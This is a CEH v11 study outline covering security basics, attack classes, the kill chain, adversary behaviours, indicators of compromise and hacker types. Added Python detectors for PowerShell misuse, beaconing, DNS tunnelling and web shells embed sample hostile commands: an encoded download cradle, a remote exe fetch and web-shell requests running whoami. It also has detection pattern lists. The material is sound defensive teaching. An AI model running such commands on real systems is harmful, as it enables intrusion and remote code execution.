CEHv11 Module 1 Study Outline
Elements of Information Security (know definitions also)
Element Definition
Confidentiality: Assurance that information is accessible only to those authorized to have access.
Integrity: The trustworthiness of data or resources in terms of preventing improper or unauthorized changes.
Availability: Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users.
Authenticity: The characteristic of a communication, document, or any data that ensures the quality of being genuine.
Non-Repudiation: A guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received it.
Attack Formula
Attacks = Motive (Goal) + Method + Vulnerability
Classification of Attacks
Attack Definition
Passive attacks: Do not tamper with the data; they involve intercepting and monitoring network traffic and data flow on the target network. (Sniffing and eavesdropping)
Active attacks: Tamper with the data in transit or disrupt the communication or services between the systems to bypass or break secured systems. (DoS, man-in-the-middle, session hijacking, SQL injection)
Close-in attacks: Performed when the attacker is in close physical proximity to the target systems or network in order to gather, modify, or disrupt access to information. (Eavesdropping, shoulder surfing, and dumpster diving)
Insider attacks: Involve using privileged access to violate rules or intentionally cause a threat to the organization's information or information systems. (Theft of physical devices and planting keyloggers, backdoors, and malware)
Distribution attacks: Occur when attackers tamper with hardware or software prior to installation. (Attackers tamper with the hardware or software at its source or in transit)
Information Warfare
Definition: Use of information and communication technologies (ICT) to gain competitive advantages over an opponent.
Cyber Kill Chain Methodology
Kill Chain Phase What Happens
Reconnaissance: Gather data on the target to probe for weak points.
Weaponization: Create a deliverable malicious payload by coupling an exploit with a backdoor.
Delivery: Send the weaponized bundle to the victim using email, USB, etc.
Exploitation: Exploit a vulnerability by executing code on the victim's system.
Installation: Install malware on the target system.
Command and Control: Create a command and control channel to communicate and pass data back and forth.
Actions on Objectives: Perform actions to achieve the intended objectives/goals.
Tactics, Techniques, and Procedures (TTPs) – Patterns of activities and methods associated with specific threat actors or groups of threat actors.
Tactics: Guidelines that describe the way an attacker performs the attack from beginning to end. They cover the tactics for information gathering, initial exploitation, privilege escalation, lateral movement, and the measures deployed for persistent access to the system, among other purposes.
Techniques: The technical methods used by an attacker to achieve intermediate results during the attack, such as initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration.
Procedures: The organizational approaches that threat actors follow to launch an attack. The number of actions usually differs depending on the objectives of the procedure and the threat actor group.
Adversary Behaviors
Behavior What Happens
Internal Reconnaissance: Once inside the target network, the adversary uses various techniques to carry out internal reconnaissance: enumerating systems, hosts, and processes, and executing commands to discover the local user context, system configuration, hostname, IP addresses, active remote systems, and the programs running on target systems. You can monitor this activity by checking for unusual commands executed from batch scripts and PowerShell and by using packet-capturing tools.
Use of PowerShell: The adversary uses PowerShell as a tool for automating data exfiltration and launching further attacks. To identify PowerShell misuse, check PowerShell's transcript logs or the Windows event logs. (The user agent string and IP addresses of outbound requests can be used to identify malicious hosts that try to exfiltrate data.)
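The two behaviors above (unusual commands during internal reconnaissance, and PowerShell misuse) are usually hunted the same way: take the command lines recorded by process-creation auditing or PowerShell transcripts, unwrap anything hidden behind -EncodedCommand, and score what is left. The following Python is an added example written for this outline, not CEH material or any vendor's detection rule; the sample log lines are constructed, and the indicator patterns and scoring are assumptions to be tuned for a real environment.

```python
import base64
import re

# --- Constructed sample data (not real logs) ----------------------------------
# Lines shaped like process-creation / PowerShell transcript entries.  The encoded
# payload is generated here so the example runs offline.

def encode_ps_command(cmd):
    """Encode a command the way -EncodedCommand expects: UTF-16LE text, then base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"

SAMPLE_LOG = [
    "powershell.exe Get-ChildItem C:\\Users",
    "powershell.exe -nop -w hidden -EncodedCommand " + encode_ps_command(CRADLE),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe Invoke-WebRequest -Uri http://203.0.113.9/x -OutFile C:\\Windows\\Temp\\x.exe",
]

# --- Detection logic (assumed indicator list; tune for your environment) -------
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

INDICATORS = [  # (pattern applied to the visible *and* decoded command text, label)
    (re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE), "invoke-expression"),
    (re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b",
                re.IGNORECASE), "download-cradle"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE), "hidden-window"),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE), "execution-policy-bypass"),
]

def decode_encoded_command(line):
    """Return the plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_line(line):
    """Score one command line; the decoded payload is inspected alongside the raw line."""
    decoded = decode_encoded_command(line)
    text = line if decoded is None else line + " " + decoded
    hits = [label for rx, label in INDICATORS if rx.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded-command")   # the encoding itself is worth a look
    return {"line": line, "decoded": decoded, "indicators": hits, "score": len(hits)}

def find_powershell_misuse(lines):
    """Return records for lines with at least one indicator, highest score first."""
    findings = [r for r in map(analyze_line, lines) if r["indicators"]]
    return sorted(findings, key=lambda r: r["score"], reverse=True)

if __name__ == "__main__":
    for f in find_powershell_misuse(SAMPLE_LOG):
        print(f["score"], f["indicators"], f["decoded"] or f["line"])
```

The point of decoding before matching is that the download cradle in the second sample line is invisible in the raw event; only the UTF-16LE base64 payload reveals it. The third line (ExecutionPolicy Bypass on a backup script) scores low and is the kind of hit an analyst triages rather than escalates.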
Unspecified Proxy Activities: The adversary creates and configures multiple domains pointing to the same host, allowing it to switch quickly between domains to avoid detection. By checking the data feeds generated for the adversary's domains, you can find malicious files downloaded and unsolicited communication with the outside network based on those domains.
Use of Command-Line Interface: On gaining access to the target system, an adversary can use the command-line interface to interact with it: browse files, read and modify file content, create new accounts, connect to remote systems, and download and install malicious code. You can identify this behavior by checking the logs for process IDs, processes whose names are arbitrary strings of letters and numbers, and malicious files downloaded from the internet.
HTTP User Agent: In HTTP-based communication, the server identifies the connected HTTP client using the User-Agent header field. An adversary modifies the content of the user agent field to communicate with the compromised system and to carry out further attacks. You can identify this at an early stage by checking the content of the user agent field.
Command and Control Server: Adversaries use command and control servers to communicate remotely with compromised systems, typically over an encrypted session. Using this channel, the adversary can steal data, delete data, and launch further attacks. You can detect compromised hosts by monitoring network traffic for outbound connection attempts, unwanted open ports, and other anomalies.
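Because the C2 session is encrypted, the content of the channel is not available; what remains observable is the timing of the outbound connection attempts. An implant checking in on a fixed interval (with a little jitter) produces a flow whose inter-connection gaps are far more regular than a user's browsing. The Python below is an added example for this outline, not CEH material or a product's detection logic: it groups constructed connection records by source, destination and port and flags groups whose gap timing has a low coefficient of variation. The thresholds (six connections, cv of 0.2) are assumptions.

```python
import statistics
from collections import defaultdict

# Constructed connection records (epoch seconds, src_ip, dst_ip, dst_port); not real traffic.
# 10.0.0.9 -> 198.51.100.77:443 fires about every 60 s with slight jitter (implant
# check-in); 10.0.0.5 -> 203.0.113.10:443 is bursty, browser-like traffic; 10.0.0.7
# touches the same C2 address only twice, too few samples to judge.
SAMPLE_CONNECTIONS = [
    (0, "10.0.0.9", "198.51.100.77", 443),
    (5, "10.0.0.5", "203.0.113.10", 443),
    (7, "10.0.0.5", "203.0.113.10", 443),
    (10, "10.0.0.7", "198.51.100.77", 443),
    (40, "10.0.0.5", "203.0.113.10", 443),
    (61, "10.0.0.9", "198.51.100.77", 443),
    (70, "10.0.0.7", "198.51.100.77", 443),
    (119, "10.0.0.9", "198.51.100.77", 443),
    (181, "10.0.0.9", "198.51.100.77", 443),
    (200, "10.0.0.5", "203.0.113.10", 443),
    (201, "10.0.0.5", "203.0.113.10", 443),
    (240, "10.0.0.9", "198.51.100.77", 443),
    (299, "10.0.0.9", "198.51.100.77", 443),
    (361, "10.0.0.9", "198.51.100.77", 443),
    (380, "10.0.0.5", "203.0.113.10", 443),
    (420, "10.0.0.9", "198.51.100.77", 443),
]

def interval_stats(timestamps):
    """Mean and coefficient of variation of the gaps between consecutive connections."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if not gaps:
        return 0.0, float("inf")
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
    return mean, cv

def find_beacons(connections, min_connections=6, max_cv=0.2):
    """Group flows by (src, dst, port) and flag those with regular, low-jitter check-ins."""
    flows = defaultdict(list)
    for ts, src, dst, port in connections:
        flows[(src, dst, port)].append(ts)
    beacons = {}
    for key, stamps in flows.items():
        if len(stamps) < min_connections:
            continue   # too few samples to judge periodicity
        mean, cv = interval_stats(stamps)
        if cv <= max_cv:
            beacons[key] = {"connections": len(stamps), "mean_interval": mean, "cv": cv}
    return beacons

if __name__ == "__main__":
    for (src, dst, port), info in find_beacons(SAMPLE_CONNECTIONS).items():
        print(f"{src} -> {dst}:{port} every ~{info['mean_interval']:.0f}s "
              f"({info['connections']} connections, cv={info['cv']:.3f})")
```

Legitimate software also beacons (update checks, telemetry), so the flagged destination still has to be vetted against known-good services; the value of the check is that it works without decrypting anything.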
Use of DNS Tunneling: Adversaries use DNS tunneling to hide malicious traffic inside the legitimate traffic carried by common protocols on the network. Using DNS tunneling, an adversary can communicate with the command and control server, bypass security controls, and exfiltrate data. You can identify DNS tunneling by analyzing malicious DNS requests, the DNS payload, unknown domains, and the destination of DNS requests.
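A tunnel has to push its data through the query name (outbound) and the answer record (inbound), which leaves measurable traces: long labels, random-looking (high-entropy) subdomains, record types such as TXT or NULL that carry arbitrary payload, and a unique name on every query so that resolver caches never answer. The Python below is an added example for this outline, not CEH material or a product's detection logic; the query records are constructed, and the thresholds and the "last two labels" base-domain heuristic are simplifying assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query records (client_ip, queried name, record type); not real traffic.
# The tun.example.net queries imitate a tunnel client that packs data into long,
# high-entropy labels and reads responses back out of TXT records.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "mail.example.com", "MX"),
    ("10.0.0.7", "update.example.org", "A"),
    ("10.0.0.7", "www.example.com", "A"),
    ("10.0.0.9", "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6.0001.tun.example.net", "TXT"),
    ("10.0.0.9", "q7r8s9t0u1v2w3x4y5z6a7b8c9d0e1f2.0002.tun.example.net", "TXT"),
    ("10.0.0.9", "g3h4i5j6k7l8m9n0o1p2q3r4s5t6u7v8.0003.tun.example.net", "TXT"),
    ("10.0.0.9", "w9x0y1z2a3b4c5d6e7f8g9h0i1j2k3l4.0004.tun.example.net", "TXT"),
]

RARE_TYPES = {"TXT", "NULL"}   # record types that carry arbitrary payload back to the client

def shannon_entropy(s):
    """Bits per character; random-looking encodings score high, dictionary words low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def query_features(qname):
    """Split a name into base domain and subdomain part and measure the subdomain."""
    labels = qname.lower().rstrip(".").split(".")
    # Treating the last two labels as the registered domain is a simplification;
    # a real tool should use the Public Suffix List (think co.uk).
    base = ".".join(labels[-2:])
    sub_labels = labels[:-2]
    return {
        "base": base,
        "label_count": len(sub_labels),
        "longest_label": max((len(l) for l in sub_labels), default=0),
        "entropy": shannon_entropy("".join(sub_labels)),
    }

def detect_dns_tunneling(queries, min_entropy=3.5, min_label_len=30, min_suspicious=3):
    """Aggregate per base domain and flag domains receiving many payload-like queries."""
    per_base = defaultdict(lambda: {"queries": 0, "suspicious": 0, "rare_types": 0,
                                    "subdomains": set(), "clients": set()})
    for client, qname, qtype in queries:
        f = query_features(qname)
        s = per_base[f["base"]]
        s["queries"] += 1
        s["subdomains"].add(qname.lower())
        s["clients"].add(client)
        if f["entropy"] >= min_entropy or f["longest_label"] >= min_label_len:
            s["suspicious"] += 1
        if qtype.upper() in RARE_TYPES:
            s["rare_types"] += 1
    flagged = {}
    for base, s in per_base.items():
        if s["suspicious"] < min_suspicious:
            continue
        reasons = ["many long/high-entropy subdomains"]
        if s["rare_types"] == s["queries"]:
            reasons.append("all queries use payload-carrying record types")
        if len(s["subdomains"]) == s["queries"]:
            reasons.append("every query is a unique name (defeats caching)")
        flagged[base] = {"reasons": reasons, "clients": sorted(s["clients"]),
                         "queries": s["queries"]}
    return flagged

if __name__ == "__main__":
    for base, info in detect_dns_tunneling(SAMPLE_QUERIES).items():
        print(base, info)
```

Aggregating per base domain rather than per query matters: a single odd-looking name is noise (CDNs and anti-spam services produce plenty), whereas a stream of unique, long, high-entropy names under one domain from one client is the tunnel's signature.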
Use of Web Shell: An adversary uses a web shell to manipulate the web server by planting a script within the website that gives remote access to the server's functionality. Using a web shell, an adversary performs tasks such as data exfiltration, file transfers, and file uploads. You can identify a web shell running in the network by analyzing server access and error logs, suspicious strings that indicate encoding, user agent strings, and other methods.
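The HTTP User Agent and Use of Web Shell entries above both come down to reading the web server's access log with a few questions in mind: is a script being executed from a directory that should only hold uploads or images, is it being passed a command-like or encoded parameter, and is the caller a browser or a scripted client with a tool, forged or empty User-Agent? The Python below is an added example for this outline, not CEH material or a product's detection logic; it parses constructed lines in the common "combined" log format, and the directory list, parameter names and User-Agent patterns are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in the Apache/NGINX "combined" format (not real traffic).
# 198.51.100.23 drives a PHP file planted in the uploads directory with a scripted client;
# 198.51.100.40 hits a JSP in the same directory with a base64 argument and no User-Agent.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/118.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /images/logo.png HTTP/1.1" 200 8412 "http://www.example.com/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/118.0"
203.0.113.8 - - [10/Oct/2023:13:57:02 +0000] "GET /admin.php?action=list HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/117.0"
198.51.100.23 - - [10/Oct/2023:13:58:01 +0000] "POST /uploads/avatar.php?cmd=whoami HTTP/1.1" 200 312 "-" "python-requests/2.31.0"
198.51.100.23 - - [10/Oct/2023:13:58:09 +0000] "POST /uploads/avatar.php?cmd=id HTTP/1.1" 200 1402 "-" "python-requests/2.31.0"
198.51.100.23 - - [10/Oct/2023:13:58:15 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 64 "-" "python-requests/2.31.0"
198.51.100.40 - - [10/Oct/2023:14:02:44 +0000] "GET /uploads/x.jsp?c=ZWNobyAkKHdob2FtaSk= HTTP/1.1" 200 97 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx")
STATIC_DIRS = ("/uploads/", "/images/", "/media/", "/static/")   # should never serve scripts
SHELL_PARAMS = {"cmd", "exec", "command", "shell", "c"}            # common web-shell argument names
TOOL_UA_RE = re.compile(r"python-requests|curl/|wget/|go-http-client|libwww", re.IGNORECASE)
ENCODED_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}|base64_decode|eval\(|%65%76%61%6c", re.IGNORECASE)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def request_indicators(rec):
    """Indicators for one request: where the script lives, what it is passed, who calls it."""
    url = urlsplit(rec["target"])
    path = url.path.lower()
    is_script = path.endswith(SCRIPT_EXT)
    hits = []
    if is_script and path.startswith(STATIC_DIRS):
        hits.append("script-in-static-dir")
    if SHELL_PARAMS & set(parse_qs(url.query, keep_blank_values=True)):
        hits.append("shell-parameter")
    if ENCODED_RE.search(url.query):
        hits.append("encoded-parameter")
    ua = rec["ua"].strip()
    if is_script and ua in ("", "-"):
        hits.append("empty-user-agent")      # browsers always send one; scripts often don't
    elif is_script and TOOL_UA_RE.search(ua):
        hits.append("tool-user-agent")       # a scripted client driving a server-side script
    return hits

def find_web_shell_activity(log_text, min_indicators=2):
    """Group by (client, path) and report groups that trip several indicators."""
    groups = defaultdict(lambda: {"hits": 0, "indicators": set(), "user_agents": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = request_indicators(rec)
        if not hits:
            continue
        g = groups[(rec["ip"], urlsplit(rec["target"]).path)]
        g["hits"] += 1
        g["indicators"].update(hits)
        g["user_agents"].add(rec["ua"])
    findings = [{"ip": ip, "path": path, **g} for (ip, path), g in groups.items()
                if len(g["indicators"]) >= min_indicators]
    return sorted(findings, key=lambda f: (len(f["indicators"]), f["hits"]), reverse=True)

if __name__ == "__main__":
    for f in find_web_shell_activity(SAMPLE_ACCESS_LOG):
        print(f["ip"], f["path"], f["hits"], sorted(f["indicators"]), f["user_agents"])
```

Requiring two independent indicators per (client, path) keeps a legitimate admin using curl against admin.php from firing on its own, while a script in the uploads directory being driven by a tool client is reported even when a particular request carries no visible command.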
Data Staging: After successful penetration of the target's network, the adversary uses data staging techniques to collect and combine as much data as possible. Once collected, the adversary can either exfiltrate or destroy the data. You can detect data staging by monitoring network traffic for malicious file transfers, by file integrity monitoring, and through event logs. Types of data collected: sensitive data about employees and customers, the business tactics of the org., financial information, and network infrastructure information.
Indicators of Compromise
Definition: The clues, artifacts, and pieces of forensic data found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization's infrastructure.
Categories of Indicators of Compromise
Category Definition
Email Indicators: Attackers usually prefer email services to send malicious data to the target org. or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender's email address, the email subject, and attachments or links.
Network Indicators: Network indicators are useful for command and control, malware delivery, and identifying details about the operating system, browser type, and other computer-specific information. Examples of network indicators include URLs, domain names, and IP addresses.
Host-based Indicators: Host-based indicators are found by performing an analysis of the infected system within the org. network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutexes.
Behavioral Indicators: Typical IoCs are useful for identifying indications of intrusion, such as malicious IP addresses, virus signatures, MD5 hashes, and domain names. Behavioral IoCs are used to identify specific behavior related to malicious activities, such as code injection into memory or the running of scripts by an application. Well-defined behaviors enable broad protection that blocks current and future malicious activity, and they are useful for identifying when legitimate system servers are used for abnormal or unexpected activities. Examples include a document executing a PowerShell script, and remote command execution.
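The practical difference between the categories is how each one is matched. Atomic indicators (hashes, filenames, registry keys, mutexes, domains, IPs, senders) are compared against artifacts, with a few details that matter: a hash catches a renamed file but not a recompiled one, a filename catches a lookalike but not a renamed copy, and a domain indicator has to match subdomains without matching lookalike names. A behavioral indicator, by contrast, is a relationship between events, here an Office process spawning a shell. The Python below is an added example for this outline, not CEH material or any threat feed: every indicator, file, process and event in it is constructed.

```python
import hashlib

# --- Constructed indicator set (all values made up for this example) --------------
MALICIOUS_SAMPLE = b"MZ\x90\x00constructed-malware-sample"   # stands in for a known-bad binary
IOC = {
    "file_hashes": {hashlib.sha256(MALICIOUS_SAMPLE).hexdigest()},
    "filenames": {"svch0st.exe", "update_checker.dll"},
    "registry_keys": {r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    "mutexes": {r"Global\Ms7Updt"},
    "domains": {"cdn-update.example.net"},
    "ips": {"198.51.100.77"},
    "email_senders": {"invoice@example-billing.test"},
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# --- Constructed host snapshot and event data (not from a real system) --------------
HOST = {
    "files": {   # path -> file bytes
        r"C:\Windows\System32\svchost.exe": b"MZ\x90\x00legitimate-system-binary",
        r"C:\Users\alice\AppData\Roaming\installer.exe": MALICIOUS_SAMPLE,      # renamed: hash still matches
        r"C:\Users\alice\Downloads\svch0st.exe": b"MZ\x90\x00unrelated-content",  # name matches, hash does not
    },
    "registry_keys": {r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
                      r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip"},
    "mutexes": {r"Global\Ms7Updt", r"Local\ExplorerStartup"},
    "processes": [   # (pid, parent pid, image name)
        (4, 0, "System"), (1200, 800, "explorer.exe"), (2300, 1200, "WINWORD.EXE"),
        (2410, 2300, "powershell.exe"), (2500, 1200, "chrome.exe"),
    ],
}
NETWORK_EVENTS = [   # (client, kind, value)
    ("10.0.0.5", "dns", "www.example.com"),
    ("10.0.0.5", "dns", "files.cdn-update.example.net"),   # subdomain of a listed domain
    ("10.0.0.7", "tcp", "198.51.100.77"),
    ("10.0.0.7", "tcp", "203.0.113.10"),
]
EMAILS = [   # (sender, subject)
    ("invoice@example-billing.test", "Invoice 4471"),
    ("hr@example.com", "Policy update"),
]

def domain_matches(name, domains):
    """Exact match or subdomain of a listed domain; 'notcdn-update.example.net' must not match."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)

def match_host(host, ioc):
    """Atomic host-based indicators: hashes, filenames, registry keys, mutexes."""
    found = []
    for path, data in host["files"].items():
        if hashlib.sha256(data).hexdigest() in ioc["file_hashes"]:
            found.append(("file_hash", path))
        if path.rsplit("\\", 1)[-1].lower() in ioc["filenames"]:
            found.append(("filename", path))
    found += [("registry_key", k) for k in host["registry_keys"] & ioc["registry_keys"]]
    found += [("mutex", m) for m in host["mutexes"] & ioc["mutexes"]]
    return found

def match_network(events, ioc):
    found = []
    for client, kind, value in events:
        if kind == "dns" and domain_matches(value, ioc["domains"]):
            found.append(("domain", client, value))
        elif kind == "tcp" and value in ioc["ips"]:
            found.append(("ip", client, value))
    return found

def match_email(emails, ioc):
    return [("sender", s, subj) for s, subj in emails if s.lower() in ioc["email_senders"]]

def match_behavior(processes):
    """Behavioral indicator: an Office document spawning a script host or shell."""
    image = {pid: img.lower() for pid, _, img in processes}
    return [("office-spawns-shell", f"{image[ppid]} -> {img.lower()}")
            for _, ppid, img in processes
            if img.lower() in SHELLS and image.get(ppid) in OFFICE_APPS]

def scan(host=HOST, network=NETWORK_EVENTS, emails=EMAILS, ioc=IOC):
    return {"host": match_host(host, ioc), "network": match_network(network, ioc),
            "email": match_email(emails, ioc), "behavior": match_behavior(host["processes"])}

if __name__ == "__main__":
    for category, hits in scan().items():
        print(category, hits)
```

The behavioral rule is the only one that would still fire if the attacker changed the payload, its filename, its mutex and its C2 domain; that is the "broad protection" the outline attributes to well-defined behaviors.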
Hacking
Definition: Exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves modifying system or application features to achieve a goal outside the creator's intended purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, leading to business loss. Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using Trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motives behind hacking include stealing critical information or services, thrill, intellectual challenge, curiosity, experimentation, knowledge, financial gain, prestige, power, peer recognition, and vengeance or vindictiveness, among other reasons.
Describe a hacker
A hacker is an intelligent person with excellent computer skills, along with the ability to create and explore the computer's software and hardware. They break into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. Usually, a hacker is a skilled engineer or programmer with subject expertise and enough knowledge to discover vulnerabilities in a target system. For some hackers, hacking is a hobby to see how many computers or networks they can compromise, and they tend to enjoy learning the details of various programming languages and computer systems to gain knowledge or to do illegal things. Some hack with malicious intent, like stealing business data, credit card information, social security numbers, and email passwords.
_____________________________________________________________________________________
Hacker Classes
Hacker Class Definition
Black hat Individuals who use their extraordinary computing skills for illegal
or malicious purposes. They are often involved in criminal
activities. Also known as “Crackers”
White hats Also called penetration testers, are individuals who use their
hacking skills for defensive purposes. Almost every organization
has security analysts who are knowledgeable about hacking
countermeasures, which can secure its network and information
systems against malicious attacks. They have permission from the
system owner.
Gray hats Individuals who work both offensively and defensively at various times. They might help hackers find vulnerabilities in a system or network and, at the same time, help vendors improve products (software or hardware) by identifying limitations and making them more secure.
Suicide Hackers Individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment. Suicide hackers are similar to suicide bombers who sacrifice their life in an attack and are thus not concerned with the consequences of their actions.
Script Kiddies Unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They usually focus on the quantity of the attacks that they initiate. They do not have a specific target or goal in performing the attack and simply aim to gain popularity or prove their technical skills.
Cyber Terrorists Individuals with a wide range of skills, motivated by religious or
political beliefs, to create fear of large-scale disruption of computer
networks.
State-Sponsored Hackers Highly skilled individuals having expertise in hacking and are
employed by the government to penetrate, gain top-secret
information from, and damage the information systems of other
government or military orgs. The main aim of these threat actors is
to detect vulnerabilities in and exploit a nation’s infrastructure and
gather intelligence or sensitive information.
Hacktivist A form of activism in which hackers break into government or
corporate computer systems as an act of protest. They use hacking
to increase awareness of their social or political agendas, as well as
to boost their own reputations in both online and offline arenas.
Hacker Teams A consortium of skilled hackers having their own resources and
funding. They work together in synergy for researching state-of-
the-art technologies. These threat actors can also detect
vulnerabilities, develop advanced tools, and execute attacks with
proper planning.
Industrial Spies Individuals who perform corporate espionage by illegally spying on
competitor orgs. They focus on stealing critical information such as
blueprints, formulas, product designs, and trade secrets. These
threat actors use advanced persistent threats (APTs) to penetrate a
network and can also stay undetected for years. In some cases,
they may use social engineering techniques to steal sensitive
information such as development plans and marketing strategies of
the target company, which can result in financial loss to that
company.
Insider Any employee (trusted person) who has access to critical assets of the org. An insider threat involves the use of privileged access to violate rules or intentionally cause harm to the org's information or information systems. They can easily bypass security rules, corrupt valuable resources, and access sensitive information. Generally disgruntled employees, terminated employees, and undertrained staff members.
Criminal Syndicates Groups of individuals or communities that are involved in
organized, planned, and prolonged criminal activities. They exploit
victims from distinct jurisdictions on the internet, making them
difficult to locate. The goal of these actors is to illegally embezzle
money by performing sophisticated cyber-attacks and money-
laundering activities.
Organized Hacker A group of hackers working together in criminal activities. Such
groups are well organized in a hierarchical structure consisting of
leaders and workers. The group can have multiple layers of
management. These hackers are miscreants or hardened criminals
who do not use their own devices; rather, they use rented devices
or botnets and crimeware services to perform various cyber-
attacks to pilfer money from victims and sell their information to
the highest bidder. They can also swindle intellectual property,
trade secrets, and marketing plans; covertly penetrate the target
network; and remain undetected for long periods.
Hacking Phases
Phase What happens
Mitre or kill chain?
Ethical Hacking
Definition: The practice of employing computer and network skills in order to assist orgs. in testing their
network security for possible loopholes and vulnerabilities. White Hats = Ethical Hackers. Orgs hire
White Hats to assist them in enhancing their cybersecurity. They hack in ethical ways, with the
permission of the network or system owner and without the intention to cause harm. They report all
vulnerabilities to the system and network owner for remediation, thereby increasing the security of an
org’s information system. Ethical hacking involves the use of hacking tools, tricks, and techniques
typically used by an attacker to verify the existence of exploitable vulnerabilities in a system’s security.
List some reasons why Ethical Hacking is Necessary
Refer to slide
To prevent hackers from gaining access to the org’s information systems
To uncover vulnerabilities in systems and explore their potential as security risk
To analyze and strengthen an org’s security posture, including policies, network protection
infrastructure, and end-user practices.
To provide adequate preventive measures in order to avoid security breaches.
To help safeguard customer data
To enhance security awareness at all levels in a business.
?
?
Scope of Ethical Hacking
Ethical hacking is a crucial component of risk assessment, auditing, counter-fraud, and information systems security best practices.
It is used to identify risks and highlight remedial actions; it also reduces Information and Communication Technology (ICT) costs by resolving vulnerabilities.
Limitations of Ethical Hacking
Unless a business already knows what it is looking for and why it is hiring an outside vendor to hack its systems in the first place, chances are there will not be much to gain from the experience.
An ethical hacker can only help the organization better understand its security system; it is up to the organization to place the right safeguards on the network.
Ethical Hacker Skills
Technical:
  In-depth knowledge of major operating environments such as Windows, Unix, Linux, and Macintosh
  In-depth knowledge of networking concepts, technologies, and related hardware and software
  A computer expert adept at technical domains
  Knowledgeable about security areas and related issues
  "High technical" knowledge for launching sophisticated attacks
Non-Technical:
  The ability to learn and adopt new technologies quickly
  Strong work ethics and good problem solving and communication skills
  Committed to the organization's security policies
  An awareness of local standards and laws
Information Security Controls
Term Definition
IA (Information Assurance): The assurance that the integrity, availability, confidentiality, and authenticity of information and information systems are protected during the usage, processing, storage, and transmission of information. Accomplished through physical, technical, and administrative controls.
Defense in Depth: A security strategy in which several protection layers are placed throughout an information system. It helps to prevent direct attacks against the system and its data because a break in one layer only leads the attacker to the next layer.
Risk: The degree of uncertainty or expectation that an adverse event may cause damage to the system. Risks are categorized into different levels according to their estimated impact on the system. A risk matrix is used to scale risk by considering the probability (likelihood) of the risk and its consequence (impact).
Risk relation: Risk = Threats x Vulnerabilities x Impact
Event impact: Risk = Threats x Vulnerabilities x Asset Value
Risk Management: The process of identifying, assessing, responding to, and implementing the activities that control how the org. manages the potential effect of risk. It is a continuous and increasingly complex process in the security life cycle, used to reduce and maintain risk at an acceptable level through a well-defined and actively employed security program.
Cyber Threat Intelligence
Threat Modeling
Incident Management
Incident Handling and Response
AI
Definition: _________________________________________________________________________
ML
Definition: ____________________________________________________________________________
How do AI & ML Prevent Cyber Attacks
Information Security Laws
Law Industry What law does